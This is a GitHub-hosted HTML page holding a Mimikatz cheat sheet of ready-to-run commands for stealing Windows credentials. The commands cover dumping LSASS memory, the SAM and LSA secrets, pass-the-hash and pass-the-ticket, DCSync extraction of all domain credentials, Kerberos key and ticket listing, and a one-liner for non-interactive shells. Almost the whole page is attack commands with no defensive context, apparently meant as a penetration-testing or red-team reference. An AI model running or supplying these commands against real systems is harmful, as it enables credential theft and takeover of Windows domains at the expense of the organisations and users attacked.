-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathmimikatz.html
52 lines (51 loc) · 3.97 KB
/
mimikatz.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<p><span style="font-size: 22px;"><span style="color: rgb(226, 80, 65); background-color: rgb(204, 204, 204);">Mimikatz.exe Cheat Sheet:</span> (thank you to @dw3113r for this cheatsheet)</span></p>
<p><span style="font-size: 22px;"><strong>#Dump LSASS: </strong></span></p>
<p><span style="font-size: 22px;">mimikatz privilege::debug </span></p>
<p><span style="font-size: 22px;">mimikatz token::elevate</span></p>
<p><span style="font-size: 22px;"> mimikatz sekurlsa::logonpasswords</span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#(Over) Pass The Hash </strong></span></p>
<p><span style="font-size: 22px;">mimikatz privilege::debug </span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::pth /user: /ntlm:<> /domain:</span></p>
<p><span style="font-size: 22px;"> </span></p>
<p><span style="font-size: 22px;"><strong>#List all available kerberos tickets in memory</strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::tickets </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump local Terminal Services credentials</strong> </span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::tspkg </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump and save LSASS in a file </strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::minidump c:\temp\lsass.dmp </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List cached MasterKeys </strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::dpapi </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List local Kerberos AES Keys </strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::ekeys </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump SAM Database</strong></span></p>
<p><span style="font-size: 22px;">mimikatz lsadump::sam </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump SECRETS Database </strong></span></p>
<p><span style="font-size: 22px;">mimikatz lsadump::secrets </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Inject and dump the Domain Controller’s Credentials</strong></span></p>
<p><span style="font-size: 22px;">mimikatz privilege::debug </span></p>
<p><span style="font-size: 22px;">mimikatz token::elevate </span></p>
<p><span style="font-size: 22px;">mimikatz lsadump::lsa /inject </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump the Domain’s Credentials without touching DC’s LSASS and also remotely </strong></span></p>
<p><span style="font-size: 22px;">mimikatz lsadump::dcsync /domain: /all #List and Dump local kerberos credentials</span></p>
<p><span style="font-size: 22px;">mimikatz kerberos::list /dump </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Pass The Ticket </strong></span></p>
<p><span style="font-size: 22px;">mimikatz kerberos::ptt </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List TS/RDP sessions</strong> </span></p>
<p><span style="font-size: 22px;">mimikatz ts::sessions </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List Vault credentials</strong></span></p>
<p><span style="font-size: 22px;">mimikatz vault::list</span></p>
<br>
<p><span style="font-size: 22px;"><strong>#One Liner Mimikatz - this is if you do not have a fully interactive shell</strong></span></p>
<p><span style="font-size: 22px;"> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit</span></p>